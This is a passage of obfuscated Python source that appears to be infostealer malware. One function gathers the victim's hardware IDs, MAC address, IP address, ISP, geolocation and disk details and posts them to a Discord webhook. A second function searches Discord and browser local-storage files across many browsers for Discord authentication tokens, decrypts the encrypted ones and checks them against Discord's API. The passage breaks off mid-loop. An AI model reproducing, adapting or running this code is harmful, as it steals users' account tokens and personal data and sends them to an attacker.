    WWSVURMZFWFWUWZRKQYYQYTPVQRDFOKEGBQBLZWKEXTQCAFVZKSSNV = JNXRNOAENLMDTCBBEXSSMMRWDHGFOWXISOMZKQSUTNAVKHHHQPSEOCQGKKBNTNOINLJLWOLJGCZGXDMKNKNMVIBL.get('as', "None")

def NZXGRFJJOIQPYWWMWSKYRGADBCFRISMKEDKIRHMEUQOCESGMQFYSNURVXINEPKABVQHOQUXYISYQJOVCDIFAAKBHCYPOEY():
    import platform
    import subprocess
    import uuid
    import psutil
    import GPUtil
    import ctypes
    import win32api
    import string
    import screeninfo
    from discord import SyncWebhook, Embed

    try: OKQLYHUNSJXNHBQBPQVTLCRAFKNJOUTXZZUKJWCBMLYVWHQFHAYPP = {platform.system()}
    except: OKQLYHUNSJXNHBQBPQVTLCRAFKNJOUTXZZUKJWCBMLYVWHQFHAYPP = "None"

    try: GQSOQNKFAJMRUPUGBFWEGZXKBUBWOXVDOGVIULTXMMEUBULZWBRXCREZERQVKNOKPZDMCFTPCSRYZPPL = platform.version()
    except: GQSOQNKFAJMRUPUGBFWEGZXKBUBWOXVDOGVIULTXMMEUBULZWBRXCREZERQVKNOKPZDMCFTPCSRYZPPL = "None"

    try: DGVYNXUNEEOWORYSRCABEZPNKZHVBTIGZHFLVNHDVIBNVWPTCAPGNHEQQYCNCKBJSBWXATTOIDQWBTRGIDNFZNLJKVFGPY = ':'.join(['{:02x}'.format((uuid.getnode() >> elements) & 0xff) for elements in range(0,2*6,2)][::-1])
    except: DGVYNXUNEEOWORYSRCABEZPNKZHVBTIGZHFLVNHDVIBNVWPTCAPGNHEQQYCNCKBJSBWXATTOIDQWBTRGIDNFZNLJKVFGPY = "None"

    try: OXNZJHHLYJSCGLESDPHKDPGIMCQZMDAUFDVVRRDUCSPPPEZURDEVPTOMYPCYYPRETWLOCBHFSWUATXPXBKKRLDPTKJOEBISGUEBS = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode('utf-8').split('\n')[1].strip()
    except: OXNZJHHLYJSCGLESDPHKDPGIMCQZMDAUFDVVRRDUCSPPPEZURDEVPTOMYPCYYPRETWLOCBHFSWUATXPXBKKRLDPTKJOEBISGUEBS = "None"

    try: TINOZNVHAKRXKRLCGTPSOLRFUNUBVYTQXCNDLCLCHJVGFJFEPJXZUHHVDPYQIGAQEGXTGSEVGGGFYGRPCHLXUSPHFLYYFHVNZG = round(psutil.virtual_memory().total / (1024**3), 2)
    except: TINOZNVHAKRXKRLCGTPSOLRFUNUBVYTQXCNDLCLCHJVGFJFEPJXZUHHVDPYQIGAQEGXTGSEVGGGFYGRPCHLXUSPHFLYYFHVNZG = "None"

    try: OORYRRKXSVSHURTJSZLRJPPWADGFTFUWUAASMUIJMHPWPOZZFWLGOYDGZNNSKHTJWKAQOYPMDDHKFEZYDOWAKMJZQTAAT = platform.processor()
    except: OORYRRKXSVSHURTJSZLRJPPWADGFTFUWUAASMUIJMHPWPOZZFWLGOYDGZNNSKHTJWKAQOYPMDDHKFEZYDOWAKMJZQTAAT = "None"

    try: GUDKCBBCVVZGNWLPZNTHCJFPUUGDVDDITSLPMMUGUBWYZFJDONLGLSVLS = psutil.cpu_count(logical=False)
    except: GUDKCBBCVVZGNWLPZNTHCJFPUUGDVDDITSLPMMUGUBWYZFJDONLGLSVLS = "None"

    try: ORPINUEMZGRDNQPJRBRRMVRNEEIGKXUFXHAHFLVFGYRDCSSKCPHR = GPUtil.getGPUs()[0].name if GPUtil.getGPUs() else "None"
    except: ORPINUEMZGRDNQPJRBRRMVRNEEIGKXUFXHAHFLVFGYRDCSSKCPHR = "None"

    try:
        YCYEFBZNZAWZUISWAIWMXNLFAMCQJZNZULINWNIDFIXBNWALCMFYQOUGXZAQHDGVFXUJQA = []
        QCPZFPXCQVSVFXSHJJNUKZKAUQEYPWVBXFHWQHMMIYJTUTQHSALWJUJVYB = ctypes.windll.kernel32.GetLogicalDrives()
        for v4r_letter in string.ascii_uppercase:
            if QCPZFPXCQVSVFXSHJJNUKZKAUQEYPWVBXFHWQHMMIYJTUTQHSALWJUJVYB & 1:
                CWBEVKCRDRUNOOBFPMOSSWMYUYTXBKYLPFZDLWJGMCTUIJJGQBES = v4r_letter + ":\\"
                try:
                    PGZFWFNHXFGMQSAYIZWIKWYQJVRPBSDMOZNUCULPTYSIZEEFSVCDOTOACDKTYCQJXHFGJEWOLFGVUHPDJKZCM = ctypes.c_ulonglong(0)
                    ECJMRHZWHLMCBYTIQVDYGMQVYQBRJYPYEXFOTBDREMNONQGYNFDHTNRV = ctypes.c_ulonglong(0)
                    ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(CWBEVKCRDRUNOOBFPMOSSWMYUYTXBKYLPFZDLWJGMCTUIJJGQBES), None, ctypes.pointer(ECJMRHZWHLMCBYTIQVDYGMQVYQBRJYPYEXFOTBDREMNONQGYNFDHTNRV), ctypes.pointer(PGZFWFNHXFGMQSAYIZWIKWYQJVRPBSDMOZNUCULPTYSIZEEFSVCDOTOACDKTYCQJXHFGJEWOLFGVUHPDJKZCM))
                    UXRPAMARTFFBFQMWOENSHWZNXVKYDPCUSDGGKTWTNRUNBXHWXPOPCLXRFQBEJEHRNCYCKMRSZQJQAFBG = ECJMRHZWHLMCBYTIQVDYGMQVYQBRJYPYEXFOTBDREMNONQGYNFDHTNRV.value
                    MOBWXTZFVIHTXEDXFFUIVVCJAWOUXUQQAGGPKZNHWBODUYQYMYDIPPTATLRCEWZFAVJTM = PGZFWFNHXFGMQSAYIZWIKWYQJVRPBSDMOZNUCULPTYSIZEEFSVCDOTOACDKTYCQJXHFGJEWOLFGVUHPDJKZCM.value
                    TPMFAQXLQGKWQIMLLYXZNIXGGKTJMGGHRGNUDZVDMJMEUWODMNDXAHMXRPQ = UXRPAMARTFFBFQMWOENSHWZNXVKYDPCUSDGGKTWTNRUNBXHWXPOPCLXRFQBEJEHRNCYCKMRSZQJQAFBG - MOBWXTZFVIHTXEDXFFUIVVCJAWOUXUQQAGGPKZNHWBODUYQYMYDIPPTATLRCEWZFAVJTM
                    EHFVGPMEBSYLIYOGYQCEOEJWGZXIOPSCFKIBXYYGEQZKSIWKBMGSCPMBPBRLMGCJVHEBDGJLAFKFGUUTSQUVPHZQRFGSKZOTPC = win32api.GetVolumeInformation(CWBEVKCRDRUNOOBFPMOSSWMYUYTXBKYLPFZDLWJGMCTUIJJGQBES)[0]
                    drive = {
                        'drive': CWBEVKCRDRUNOOBFPMOSSWMYUYTXBKYLPFZDLWJGMCTUIJJGQBES,
                        'total': UXRPAMARTFFBFQMWOENSHWZNXVKYDPCUSDGGKTWTNRUNBXHWXPOPCLXRFQBEJEHRNCYCKMRSZQJQAFBG,
                        'free': MOBWXTZFVIHTXEDXFFUIVVCJAWOUXUQQAGGPKZNHWBODUYQYMYDIPPTATLRCEWZFAVJTM,
                        'used': TPMFAQXLQGKWQIMLLYXZNIXGGKTJMGGHRGNUDZVDMJMEUWODMNDXAHMXRPQ,
                        'name': EHFVGPMEBSYLIYOGYQCEOEJWGZXIOPSCFKIBXYYGEQZKSIWKBMGSCPMBPBRLMGCJVHEBDGJLAFKFGUUTSQUVPHZQRFGSKZOTPC,
                    }
                    YCYEFBZNZAWZUISWAIWMXNLFAMCQJZNZULINWNIDFIXBNWALCMFYQOUGXZAQHDGVFXUJQA.append(drive)
                except:
                    ()
            QCPZFPXCQVSVFXSHJJNUKZKAUQEYPWVBXFHWQHMMIYJTUTQHSALWJUJVYB >>= 1

        TXMOOHJUNJILRAUTDUQYZUYFHCPQGTCNNEBGSYFNBJIQTMDOEVEZUTANFNRARADKKDMJOQTOJ = "{:<7} {:<10} {:<10} {:<10} {:<20}\n".format("Drive:", "Free:", "Total:", "Use:", "Name:")
        for v4r_drive in YCYEFBZNZAWZUISWAIWMXNLFAMCQJZNZULINWNIDFIXBNWALCMFYQOUGXZAQHDGVFXUJQA:
            GCYGNHOHJHVSEAUQKZMRLNBFKURTCNFKYLYWHQGORKTPLYOXWAPXDLWLQTMQPVVOKWHNIIVXCRUC = (v4r_drive['used'] / v4r_drive['total']) * 100
            MOBWXTZFVIHTXEDXFFUIVVCJAWOUXUQQAGGPKZNHWBODUYQYMYDIPPTATLRCEWZFAVJTM_gb = "{:.2f}GO".format(v4r_drive['free'] / (1024 ** 3))
            UXRPAMARTFFBFQMWOENSHWZNXVKYDPCUSDGGKTWTNRUNBXHWXPOPCLXRFQBEJEHRNCYCKMRSZQJQAFBG_gb = "{:.2f}GO".format(v4r_drive['total'] / (1024 ** 3))
            GCYGNHOHJHVSEAUQKZMRLNBFKURTCNFKYLYWHQGORKTPLYOXWAPXDLWLQTMQPVVOKWHNIIVXCRUC_str = "{:.2f}%".format(GCYGNHOHJHVSEAUQKZMRLNBFKURTCNFKYLYWHQGORKTPLYOXWAPXDLWLQTMQPVVOKWHNIIVXCRUC)
            TXMOOHJUNJILRAUTDUQYZUYFHCPQGTCNNEBGSYFNBJIQTMDOEVEZUTANFNRARADKKDMJOQTOJ += "{:<7} {:<10} {:<10} {:<10} {:<20}".format(v4r_drive['drive'], 
                                                                   MOBWXTZFVIHTXEDXFFUIVVCJAWOUXUQQAGGPKZNHWBODUYQYMYDIPPTATLRCEWZFAVJTM_gb,
                                                                   UXRPAMARTFFBFQMWOENSHWZNXVKYDPCUSDGGKTWTNRUNBXHWXPOPCLXRFQBEJEHRNCYCKMRSZQJQAFBG_gb,
                                                                   GCYGNHOHJHVSEAUQKZMRLNBFKURTCNFKYLYWHQGORKTPLYOXWAPXDLWLQTMQPVVOKWHNIIVXCRUC_str,
                                                                   v4r_drive['name'])
    except:
        TXMOOHJUNJILRAUTDUQYZUYFHCPQGTCNNEBGSYFNBJIQTMDOEVEZUTANFNRARADKKDMJOQTOJ = """Drive:  Free:      Total:     Use:       Name:       
None    None       None       None       None     
"""

    try:
        def IsPortable():
            try:
                battery = psutil.sensors_battery()
                return battery is not None and battery.power_plugged is not None
            except AttributeError:
                return False

        if IsPortable():
            YLVAURLGJEPWXXCYVGNZFDLSNSQEYMAYUEPRKEKRAVUMXVIEKBXHCPQKT = 'Pc Portable'
        else:
            YLVAURLGJEPWXXCYVGNZFDLSNSQEYMAYUEPRKEKRAVUMXVIEKBXHCPQKT = 'Pc Fixed'
    except:
        YLVAURLGJEPWXXCYVGNZFDLSNSQEYMAYUEPRKEKRAVUMXVIEKBXHCPQKT = "None"

    try: EXXAZCNNUYTGWHPXSJTZOJJTEKZZHLGWWTQOZNWFFTNZENKWSXZIZGYVJZSIHGMFOWZSTWYJPEHRDKSH = len(screeninfo.get_monitors())
    except: EXXAZCNNUYTGWHPXSJTZOJJTEKZZHLGWWTQOZNWFFTNZENKWSXZIZGYVJZSIHGMFOWZSTWYJPEHRDKSH = "None"

    embed = Embed(title=f'System Info {JHJKWSQPAMHXSASDEIGCRVCZPRDKCZAZXZBUAWHWDFCKBSLPXSLBNKUDYFLSYLBGYYLYEAUKMKSPKGYBJCAZD}:', color=XPAJVRCFMRTODIHPRPMQELYNIGHPNKWHQUGUJYPRLFOTYDLYDJUQCIBWMBEFJMHUETNYYAYFSBPICTBRGXRJRZHBW)

    embed.add_field(name=":bust_in_silhouette: User Pc:", value=f"""```Hostname    : {BAZFYBLCPHMKRLJKCTLTBPOETMLPNCWWJKAMFTUJSLZDHEDZWVGUQDFTOUYKSFTXQOVYECOKFUAHIHQJMGQNXQISVUBLHJ}
Username    : {TXTTHWUCUXJHXLTGMDDBDMDAVWKCAYJGXBNMOTIJFDVUZVTMKOQOWHXMYHRAUUJJGQYUIYXV}
DisplayName : {SHYWVTMHJCGBQSVVUHAMSBRFFTFEURAWKNLICCIXDZPXNFNXLBTEIBSNZCYJTTYY}```""", inline=False)

    embed.add_field(name=":computer: System:", value=f"""```Plateform     : {YLVAURLGJEPWXXCYVGNZFDLSNSQEYMAYUEPRKEKRAVUMXVIEKBXHCPQKT}
Exploitation  : {OKQLYHUNSJXNHBQBPQVTLCRAFKNJOUTXZZUKJWCBMLYVWHQFHAYPP} {GQSOQNKFAJMRUPUGBFWEGZXKBUBWOXVDOGVIULTXMMEUBULZWBRXCREZERQVKNOKPZDMCFTPCSRYZPPL}
Screen Number : {EXXAZCNNUYTGWHPXSJTZOJJTEKZZHLGWWTQOZNWFFTNZENKWSXZIZGYVJZSIHGMFOWZSTWYJPEHRDKSH}

HWID : {OXNZJHHLYJSCGLESDPHKDPGIMCQZMDAUFDVVRRDUCSPPPEZURDEVPTOMYPCYYPRETWLOCBHFSWUATXPXBKKRLDPTKJOEBISGUEBS}
MAC  : {DGVYNXUNEEOWORYSRCABEZPNKZHVBTIGZHFLVNHDVIBNVWPTCAPGNHEQQYCNCKBJSBWXATTOIDQWBTRGIDNFZNLJKVFGPY}
CPU  : {OORYRRKXSVSHURTJSZLRJPPWADGFTFUWUAASMUIJMHPWPOZZFWLGOYDGZNNSKHTJWKAQOYPMDDHKFEZYDOWAKMJZQTAAT}, {GUDKCBBCVVZGNWLPZNTHCJFPUUGDVDDITSLPMMUGUBWYZFJDONLGLSVLS} Core
GPU  : {ORPINUEMZGRDNQPJRBRRMVRNEEIGKXUFXHAHFLVFGYRDCSSKCPHR}
RAM  : {TINOZNVHAKRXKRLCGTPSOLRFUNUBVYTQXCNDLCLCHJVGFJFEPJXZUHHVDPYQIGAQEGXTGSEVGGGFYGRPCHLXUSPHFLYYFHVNZG}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {OUAAMEFHZSRZNTGVUPATUVZSJRFMDGBZYQWKUKLYGWECWTWVSPZVIBRYYUFNAFUALICZTGCBYVGMIOKY}
Local  : {UKTMNCZXFDYOHZEDVSUTEDHADHWSSEDIMWGNNKVLXRZLAXZDBADHWNVHIQGKDDTOBULFTOPDAXQDKBCKDRMOIKDZAAJS}
Isp    : {CZBYHJUTONHGAJTRKRNEEOGOIWNGJWPGVNDOMPWDCZNFDXLFBFFZUBZOFTFVPNDXFUKVGGCISJYLCVTOETGUGBGCUQEKNT}
Org    : {ITPKUKVGVELMQYBHIHQAKAJQYHLRPSZLZAPVFIRENRAYTYMRKIEEOJQGVXLONBMKDA}
As     : {WWSVURMZFWFWUWZRKQYYQYTPVQRDFOKEGBQBLZWKEXTQCAFVZKSSNV}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{TXMOOHJUNJILRAUTDUQYZUYFHCPQGTCNNEBGSYFNBJIQTMDOEVEZUTANFNRARADKKDMJOQTOJ}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR} ({MZSGIZOTJAWXQOYPNRECAGAKAHYKACHKUIDHRHZGLNROZKQKFGJKBOAEQJPQBPBGVDQVXERIVAHKJALVHNR_code})
Region    : {PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD} ({PKUDCAQYDRZEPSRXLSVJNRAUZJOHMDNQUTGXWGXNEGKKKFCYARZOGQPOTBTHLEPPVRNTOCTDHLZD_code})
Zip       : {YJZIOEJLNVHBEWKQLEQKVPIWXYMZVIANIDKUWXYSGRTPIEGUHWLDXMSGOYUWRSFGOKPPWYJLLTBXYII}
City      : {NVUSYXPWGTAHFRARZBKTIMCCYLZGWZAVHXQQHQSVBSYTBDRBGVMNELUZKACMMXULUU}
Timezone  : {ODIVNCURWJMXJGXLAMVSIORKNTJVBGEHXQTCEVPSCGUFPZOVGIOHJMQYIBZFHEORMLKFXBDCQEFLMXYPOWTKPMGSWWSXKHRHQKAZ}
Latitude  : {IGPNZGTPWFXHWSAKDCPRRUQDEHZAJNUFYBATGYLRQSSKQRWKLWTPJSNKLHLYRUDJODMOGBOAYOGSJOGQRAECWEMVHYHSGOHQH}
Longitude : {FTXPNKVNIPJGORBELQJKIFHGVNDMACJPEASURULBUOTVUUNCEBBGXWNGPKLMKCYRWFH}```""", inline=False)


    embed.set_footer(text=EYXHIFDNPLCNJBNHHFJGNMUEJBBVNTZLSCWYQYGEWLFYMCOMOCWCZPGRRVBQRZPBOVHZE, icon_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)

    TGDJIAPQDMGKOATFEYXKIIYCGSBAXXRZCFEMGUBAPCXFBWIDRUMURIQGSSXHQETEQH = SyncWebhook.from_url(HPZPFTJUMICLTXQGZGKHNCSONJDNKTSMVJQWNTYXLKMIJRMTXIVKTKNRYALPQCLWDLPAJQQJJFXCUIOVATCBVHR)
    TGDJIAPQDMGKOATFEYXKIIYCGSBAXXRZCFEMGUBAPCXFBWIDRUMURIQGSSXHQETEQH.send(embed=embed, username=OQKKSBKULTVXSMJTQTJIRXLOQDPHTFIBVNLCBWOIFVQBCAFKTAEGPQPZDWRIXWKZQHBGQZVUGSFPFGTAZNPUFCBLRGRNSTZTBVUL, avatar_url=GTGZMHOJTHCXDPEESGWHSLTQWIAWGLFFUAHQECSISRNEIMGLSZFMJUZQCPLUZUFSXUXIRP)

def SVZIKSARLWVCSRMNYTOFBNOXQEOXKSMSVJGBGMBGVPIXEBKQTKIZM():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def VTNRXIKBHHQYFCRSTGDITSGVDVZSRITRXCENUGRERZSPHSCBGKKZGVTLTJCFAXQESGQP():
        XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL = "https://discord.com/api/v9/users/@me"
        WZNQHDXUYQLFJSWXSZTQPOAITRWLUMIQCSGNJFTVVFGGHYWZDOPVTMPSEVKGZMTIUPCJHYFQUPXNGECSVYOFLJFAZIEXWK = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        WZNQHDXUYQLFJSWXSZTQPOAITRWLUMIQCSGNJFTVVFGGHYWZDOPVTMPSEVKGZMTIUPCJHYFQUPXNGECSVYOFLJFAZIEXWK_enc = r"dQw4w9WgXcQ:[^\"]*"
        KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG = []
        QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR = []
        NORWIIGUOQGQDRWFTSWGYMVPPOEOAAMGVAEWOALMBYSASVSNCISVAXQLBTCTXZBVODOPRMPQDVFHJOMVMVRISZTOIGOXJJYMNVU = {}

        NDOWUMVCGGESWHLRXMBHNJQBZMJWXFUEKOZRQNBCJJMNHROPDGNFFMNSVKLESEYKGHXEVZOEFQUSXDPCUJ = {
            'Discord': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': PJYJSPPEESAPENYVLFDQFRFRHNYTUYSHJHJOUSVWVOLSDWHNQIHQBHJETORFNGYTSH + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK, ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG in NDOWUMVCGGESWHLRXMBHNJQBZMJWXFUEKOZRQNBCJJMNHROPDGNFFMNSVKLESEYKGHXEVZOEFQUSXDPCUJ.items():
            if not os.path.exists(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG):
                continue
            PSWYCOSCSBIUMSKGDPMPSNVJQGLSNIMTGLAQUAATEXNDZSWDVAYIMGAJWQGVHKBLUFSZFCLRPNFCGYJYMY = ZFAICVZGCJXPJQIPVMUYMGFVHPAXPCTMNLFSZTAWSXJIQAPGLQRQYOFDVQLBPFHWFFIGEREHRBGARRJTTXVGANPXSOJK.replace(" ", "").lower()
            if "cord" in ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG:
                if not os.path.exists(SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + f'\\{PSWYCOSCSBIUMSKGDPMPSNVJQGLSNIMTGLAQUAATEXNDZSWDVAYIMGAJWQGVHKBLUFSZFCLRPNFCGYJYMY}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{ZAECCLDEULBKXDSIUUNQBEFJSSASFJTKOOVBWSZFVWRTXYDEWILGFDVEJG}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(WZNQHDXUYQLFJSWXSZTQPOAITRWLUMIQCSGNJFTVVFGGHYWZDOPVTMPSEVKGZMTIUPCJHYFQUPXNGECSVYOFLJFAZIEXWK_enc, v4r_line.strip()):
                                RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB = XWARXVUXNUNJINBVTERSKQOLBYYKFUBFGZNUDRKGKFMPAXBRGLNJTJHVal(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), WZJYEXNDYAWUXJEWZZVZIBYLCAZVSDCVRIVHCHXYFOAEMZQRFMAOVUSQPINNUJGOXJQJF(SWNOAQKKAIBEHWNHWDKFEJODUXRODUAHRIFYUMMRZXXDMRIVGKCUYCHCSZNFQSKWMFZMNWKN + f'\\{PSWYCOSCSBIUMSKGDPMPSNVJQGLSNIMTGLAQUAATEXNDZSWDVAYIMGAJWQGVHKBLUFSZFCLRPNFCGYJYMY}\\Local State'))
                                if ULWLAVXKRFARQOUDMHGTKLDMZICCCYLEJYXLGPSFXCTVMEVLYFLCW(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB, XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL):
                                    RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT = requests.get(XSIATMKDBUBJAZVWOIROLMPJXUBYOBBUCPYOKHXDDKFFMEVJFEKZYOGL, headers={'Authorization': RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB}).json()['id']
                                    if RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT not in QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR:
                                        KLMUSQPWUENYLCPMIWMVCHRUGFSFNSBRKMBPKSWHANECDTSNKTFPHNUBLSSZULZOEJBHYUOREXEOHHNHQBDLXSDG.append(RPOGJHAPKFUZYUNASLGGDFDFXSLISDYDTIKBSSJWQKIKWRWTILVGLADUVDCHUSEHZGRZIQIPFCDNUGPXJVWMVTCAIABEAB)
                                        QOVWOXIVSVKZRJBFKUHLPONCRUGQTDVQGPXKLVJFOGJEQOFKUVNIXVOODJSQJKWSOSMUITTWVPR.append(RADHZWUCJHCSZHMHEHCYAQMCLOGHDGPURNSCKYOSDFTCFZILQKBRZTPWYTWLSDGDDMEOGDPZXZIGYUFWTPUDXUIDXBHUNGYYT)
